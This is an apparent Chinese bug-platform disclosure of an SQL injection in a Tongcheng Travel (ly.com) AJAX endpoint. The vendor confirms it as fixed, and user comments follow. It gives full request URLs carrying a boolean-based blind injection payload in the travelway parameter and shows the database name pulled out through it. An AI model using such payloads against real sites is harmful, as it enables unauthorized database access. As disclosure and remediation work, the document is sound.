神器而已之苏州同程旅游SQL注入漏洞

http://go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway=%27%E9%82%AE%E8%BD%AE%27)%20and%20substring(db_name(),1,1)=%27x%27%20and%20(1=1&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703

返回false，说明数据库第一位不是x

http://go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway=%27%E9%82%AE%E8%BD%AE%27)%20and%20substring(db_name(),1,1)=%27t%27%20and%20(1=1&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703

返回true，说明数据库第一位是t

由于太卡了，我只跑了个库名

db_name() =  tccomdb

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2016-03-15 14:28

厂商回复：

感谢关注同程旅游。

最新状态：

2016-03-17：忘记公开了，漏洞已修复，路径已加软WAF，礼品卡已发：）

1. 2016-03-15 14:26 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

   1

   被动测试？

   1# 回复此人

2. 2016-03-15 17:32 | boooooom ( 普通白帽子 | Rank:486 漏洞数:53 | 我有一个好想法！)

   1

   ：）

   2# 回复此人

3. 2016-03-17 16:25 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

   1

   66666

   3# 回复此人

4. 2016-03-17 17:08 | Gump ( 普通白帽子 | Rank:171 漏洞数:39 | a,e,i,o,u)

   1

   神器：）

   4# 回复此人

5. 2016-03-17 17:12 | 屠夫 ( 路人 | Rank:8 漏洞数:3 | 乌云最帅的白帽子)

   1

   hackbar 神器

   5# 回复此人

6. 2016-03-18 09:11 | 大橙子 ( 路人 | Rank:30 漏洞数:11 | 杀过狼，放过虎，曾经是个二百五！)

   1

   还是这种公司豪放

   6# 回复此人

7. 2016-03-21 14:15 | phoenixne ( 普通白帽子 | Rank:294 漏洞数:106 | 小本毕业，向各位学习)

   1

   同城安全做的还是不错的的，态度也好。厂商楷模

   7# 回复此人